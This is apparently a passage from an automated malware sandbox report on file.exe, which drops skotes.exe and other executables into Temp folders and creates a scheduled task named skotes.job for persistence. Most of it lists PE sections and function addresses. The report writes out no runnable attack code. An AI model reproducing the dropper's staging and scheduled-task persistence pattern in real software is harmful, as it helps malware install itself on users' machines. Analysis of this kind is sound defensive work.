memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_a2042087-b
                          Source: file.exeStatic PE information: section name:
                          Source: file.exeStatic PE information: section name: .idata
                          Source: skotes.exe.0.drStatic PE information: section name:
                          Source: skotes.exe.0.drStatic PE information: section name: .idata
                          Source: random[1].exe0.6.drStatic PE information: section name:
                          Source: random[1].exe0.6.drStatic PE information: section name: .idata
                          Source: random[1].exe0.6.drStatic PE information: section name:
                          Source: f30149f036.exe.6.drStatic PE information: section name:
                          Source: f30149f036.exe.6.drStatic PE information: section name: .idata
                          Source: f30149f036.exe.6.drStatic PE information: section name:
                          Source: random[1].exe1.6.drStatic PE information: section name:
                          Source: random[1].exe1.6.drStatic PE information: section name: .idata
                          Source: random[1].exe1.6.drStatic PE information: section name:
                          Source: 176986cc9c.exe.6.drStatic PE information: section name:
                          Source: 176986cc9c.exe.6.drStatic PE information: section name: .idata
                          Source: 176986cc9c.exe.6.drStatic PE information: section name:
                          Source: random[1].exe2.6.drStatic PE information: section name:
                          Source: random[1].exe2.6.drStatic PE information: section name: .idata
                          Source: random[1].exe2.6.drStatic PE information: section name:
                          Source: f570600774.exe.6.drStatic PE information: section name:
                          Source: f570600774.exe.6.drStatic PE information: section name: .idata
                          Source: f570600774.exe.6.drStatic PE information: section name:
                          Source: random[2].exe0.6.drStatic PE information: section name:
                          Source: random[2].exe0.6.drStatic PE information: section name: .idata
                          Source: 536e42fc8b.exe.6.drStatic PE information: section name:
                          Source: 536e42fc8b.exe.6.drStatic PE information: section name: .idata
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00BECB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,6_2_00BECB97
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010581010_2_01058101
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F878BB0_2_00F878BB
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F888600_2_00F88860
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F870490_2_00F87049
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F831A80_2_00F831A8
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01057B6E0_2_01057B6E
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F44B300_2_00F44B30
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F44DE00_2_00F44DE0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F82D100_2_00F82D10
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F8779B0_2_00F8779B
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F77F360_2_00F77F36
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00C178BB2_2_00C178BB
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00C170492_2_00C17049
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00C188602_2_00C18860
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00C131A82_2_00C131A8
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00BD4B302_2_00BD4B30
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00BD4DE02_2_00BD4DE0
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00C12D102_2_00C12D10
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00C1779B2_2_00C1779B
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00C07F362_2_00C07F36
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00C178BB3_2_00C178BB
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00C170493_2_00C17049
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00C188603_2_00C18860
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00C131A83_2_00C131A8
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00BD4B303_2_00BD4B30
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00BD4DE03_2_00BD4DE0
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00C12D103_2_00C12D10
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00C1779B3_2_00C1779B
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00C07F363_2_00C07F36
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00BDE5306_2_00BDE530
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00BF61926_2_00BF6192
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00C188606_2_00C18860
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00BD4B306_2_00BD4B30
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00BD4DE06_2_00BD4DE0
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00C12D106_2_00C12D10
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00BF0E136_2_00BF0E13
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00C170496_2_00C17049
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00C131A86_2_00C131A8
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00BF16026_2_00BF1602
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00C1779B6_2_00C1779B
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00C178BB6_2_00C178BB
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00BF3DF16_2_00BF3DF1
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00C07F366_2_00C07F36
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 8_2_00227AF08_2_00227AF0
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 8_2_00221B708_2_00221B70
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 8_2_002210008_2_00221000
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 8_2_002321018_2_00232101
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 8_2_002389008_2_00238900
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 8_2_002463628_2_00246362
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 8_2_00224C008_2_00224C00
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 8_2_0022D4DB8_2_0022D4DB
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 8_2_002335008_2_00233500
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 8_2_00226D708_2_00226D70
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 8_2_0024458A8_2_0024458A
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 8_2_00223E608_2_00223E60
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 10_2_0022100010_2_00221000
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 10_2_0023210110_2_00232101
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 10_2_0023890010_2_00238900
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 10_2_00227AF010_2_00227AF0
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 10_2_0024636210_2_00246362
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 10_2_00221B7010_2_00221B70
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 10_2_00224C0010_2_00224C00
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 10_2_0022D4DB10_2_0022D4DB
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 10_2_0023350010_2_00233500
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 10_2_00226D7010_2_00226D70
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 10_2_0024458A10_2_0024458A
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 10_2_00223E6010_2_00223E60
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0040A96011_2_0040A960
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0042617011_2_00426170
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0040E2A911_2_0040E2A9
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_00416B7E11_2_00416B7E
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_00439B9011_2_00439B90
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_004233A011_2_004233A0
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_00436C4011_2_00436C40
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0043DCF011_2_0043DCF0
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_004215F011_2_004215F0
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0042C6D711_2_0042C6D7
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0043E69011_2_0043E690
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0042BFD311_2_0042BFD3
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_00410FD611_2_00410FD6
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0042BFDA11_2_0042BFDA
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_004087F011_2_004087F0
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_00436F9011_2_00436F90
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_004097B011_2_004097B0
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_00425F7D11_2_00425F7D
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0040907011_2_00409070
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0043A03011_2_0043A030
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_004038C011_2_004038C0
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_004380D911_2_004380D9
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0041D8E011_2_0041D8E0
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0042D08511_2_0042D085
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_004280B011_2_004280B0
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0042297F11_2_0042297F
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0042A10011_2_0042A100
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0043790011_2_00437900
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_00416E9711_2_00416E97
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0040591011_2_00405910
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0042592011_2_00425920
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_004301D011_2_004301D0
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_004081F011_2_004081F0
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0040899011_2_00408990
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0041719011_2_00417190
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_00414A4011_2_00414A40
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0041BA4811_2_0041BA48
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0040CA5411_2_0040CA54
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0040427011_2_00404270
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0042227011_2_00422270
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0040620011_2_00406200
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_00423A0011_2_00423A00
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0043CAC011_2_0043CAC0
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0043E2C011_2_0043E2C0
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_004292D011_2_004292D0
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_00415ADC11_2_00415ADC
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0042BA8D11_2_0042BA8D
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_004192BA11_2_004192BA
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0040B35111_2_0040B351
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0041CB5A11_2_0041CB5A
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0040936011_2_00409360
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0041C36011_2_0041C360
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_00411B1B11_2_00411B1B
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0043533A11_2_0043533A
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0043CBD611_2_0043CBD6
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0043A3F011_2_0043A3F0
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_00404BA011_2_00404BA0
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0040D44C11_2_0040D44C
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_00434C4D11_2_00434C4D
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0040747011_2_00407470
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_00419C1011_2_00419C10
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_00418C1E11_2_00418C1E
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0041D42011_2_0041D420
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0041DC2011_2_0041DC20
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0043643011_2_00436430
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0043CCE011_2_0043CCE0
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_00422CF811_2_00422CF8
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_00427C9D11_2_00427C9D
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0043CD6011_2_0043CD60
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0041657111_2_00416571
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_00424D7011_2_00424D70
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_00423D3011_2_00423D30
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0041DE4011_2_0041DE40
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_00423E4B11_2_00423E4B
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_00405E6011_2_00405E60
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0041267011_2_00412670
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0042567011_2_00425670
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0041AE0011_2_0041AE00
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0043CE0011_2_0043CE00
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_00423E3011_2_00423E30
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_004156D011_2_004156D0
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_00415EE011_2_00415EE0
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_004266E711_2_004266E7
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0040669011_2_00406690
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0043669011_2_00436690
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_00416E9711_2_00416E97
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_00402EA011_2_00402EA0
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_004376B011_2_004376B0
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_00426EBE11_2_00426EBE
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_00428F5D11_2_00428F5D
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0042B76311_2_0042B763
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_00425F7D11_2_00425F7D
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_00414F0811_2_00414F08
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0042071711_2_00420717
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0041873111_2_00418731
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0041EF3011_2_0041EF30
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_004167A511_2_004167A5
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_00418FAD11_2_00418FAD
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0043DFB011_2_0043DFB0
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_3_04D0FD0012_3_04D0FD00
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_3_04D0DF8712_3_04D0DF87
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_3_04D1970612_3_04D19706
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_3_04D0312012_3_04D03120
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_3_04D022C012_3_04D022C0
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_3_04D0E2C912_3_04D0E2C9
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_3_04D14AEE12_3_04D14AEE
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_3_04D0AA9012_3_04D0AA90
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_3_04D1521912_3_04D15219
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_3_04D0435012_3_04D04350
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_00402EC012_2_00402EC0
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_00404F5012_2_00404F50
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_0041090012_2_00410900
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_0041A30612_2_0041A306
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_0040EB8712_2_0040EB87
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_00403D2012_2_00403D20
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_00415E1912_2_00415E19
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_0040EEC912_2_0040EEC9
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_004156EE12_2_004156EE
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_0040B69012_2_0040B690
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_1000E18412_2_1000E184
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_100102A012_2_100102A0
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_00A4F4A712_2_00A4F4A7
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_00AA8E0312_2_00AA8E03
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_00AAC94F12_2_00AAC94F
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_0099AC8512_2_0099AC85
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_0098EAB412_2_0098EAB4
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_008EC6EC12_2_008EC6EC
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_008EC00612_2_008EC006
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_0090041E12_2_0090041E
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_0099060C12_2_0099060C
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_00993C3B12_2_00993C3B
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_0098322812_2_00983228
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_00917E2212_2_00917E22
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_0098B44712_2_0098B447
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_0098999C12_2_0098999C
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_00998DBB12_2_00998DBB
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_008259AA12_2_008259AA
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_0082F7B612_2_0082F7B6
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_0097DBA112_2_0097DBA1
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_00987DC612_2_00987DC6
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_00986D1612_2_00986D16
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_0099573012_2_00995730
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_0099732B12_2_0099732B
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_0098475312_2_00984753
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_0098CF4412_2_0098CF44
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_04B451B712_2_04B451B7
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_04B4EDEE12_2_04B4EDEE
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_04B43F8712_2_04B43F87
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_04B4B8F712_2_04B4B8F7
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_04B451B712_2_04B451B7
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_04B4F13012_2_04B4F130
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_04B5595512_2_04B55955
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_04B50B6712_2_04B50B67
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe 8A331CA76C2B919F30406FF66A92DB0E27AE6AF9725749A80959B42656871536
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00BEDF80 appears 82 times
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00BED942 appears 86 times
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00BED663 appears 40 times
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00BED64E appears 79 times
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00BE7A00 appears 39 times
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00C08E10 appears 47 times
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00BE80C0 appears 393 times
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: String function: 04B4A9C7 appears 35 times
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: String function: 04D09B60 appears 35 times
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: String function: 0040A760 appears 35 times
